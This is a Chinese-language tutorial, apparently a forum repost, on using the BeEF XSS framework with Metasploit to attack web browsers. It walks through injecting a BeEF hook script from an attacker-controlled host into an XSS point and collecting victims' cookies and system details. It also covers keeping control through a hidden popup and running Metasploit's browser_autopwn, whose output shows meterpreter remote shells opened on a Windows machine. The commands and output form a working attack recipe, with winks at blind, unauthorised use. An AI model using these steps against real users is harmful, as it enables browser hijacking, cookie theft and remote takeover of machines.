http://www.myhack58.com/Article/html/3/8/2013/36603.htm
1.什么是Beef
Beef是一个强大的Xss专业安全工具,不像其他的Xss渗透测试工具,Beef可以利用各种Exploit对浏览器进行渗透测试,并且设有对Metasploit的接口,利用msf丰富的漏洞资源进行安全评估。
2.如何安装Beef
具体安装的方法不多说了,详情请看我的偶像Dis9Team炊少的文章 http://fuzzexp.org/metasploit-and-beef-the-tutorial-chinese.html
3.利用Beef进行渗透测试
首先运行beef并且和msf衔接
1 | msfconsole -r ./test/thirdparty/msf/unit/BeEF.rc |
找到Xss利用的地方 插入我们的攻击代码 js的话Beef给了默认的js http://yourip:3000/hook.js 就用这个js吧!
当对方触发了攻击代码 我们的控制端便会出现类似主机上线的画面
在图中我们可以清楚的了解到 对方的操作系统是windows2003 浏览器是ie6.0 cookie以及中招的页面 (盲打你懂得)
我们可以发送各种命令给在线的主机 点击进入Command界面
为了控制的时间更长一些 我们可以发送一个命令让右下角悄悄的弹一个小窗 即使对方关闭网页 小窗还在 还是可以控制
我们还可以调用各种浏览器漏洞来攻击
下面 我们测试一下
使用msf自带的浏览器自动攻击脚本
1 | msf > use server/browser_autopwn |
2 | msf auxiliary(browser_autopwn) > set uripath / |
4 | msf auxiliary(browser_autopwn) > set lhost 192.168.128.132 |
5 | lhost => 192.168.128.132 |
6 | msf auxiliary(browser_autopwn) > run |
7 | [*] Auxiliary module execution completed |
10 | [*] Obfuscating initial javascript 2012-12-15 00:31:20 -0800 |
11 | msf auxiliary(browser_autopwn) > [*] Done in 0.986208467 seconds |
13 | [*] Starting exploit modules on host 192.168.128.132... |
16 | [*] --- Done, found 26 exploit modules |
18 | [*] Using URL: http://0.0.0.0:8080/ |
19 | [*] Local IP: http://192.168.128.132:8080/ |
27 | Id Type Information Connection |
28 | -- ---- ----------- ---------- |
29 | 1 meterpreter x86/win32 DELL-3C52E6EC1C\Administrator @ DELL-3C52E6EC1C 192.168.128.132:3333 -> 192.168.128.129:2363 (192.168.128.129) |
30 | 2 meterpreter x86/win32 DELL-3C52E6EC1C\Administrator @ DELL-3C52E6EC1C 192.168.128.132:3333 -> 192.168.128.129:2364 (192.168.128.129) |
32 | msf auxiliary(browser_autopwn) > |
我们从界面中看到目标还安装了java等等 可以根据各种信息结合msf来进行渗透测试 包括测试一些已知的溢出漏洞等等
具体的EXP可以看Commands里面的介绍 有很多 甚至有一个是利用IOS 的Safari 给他人打电话! LoL!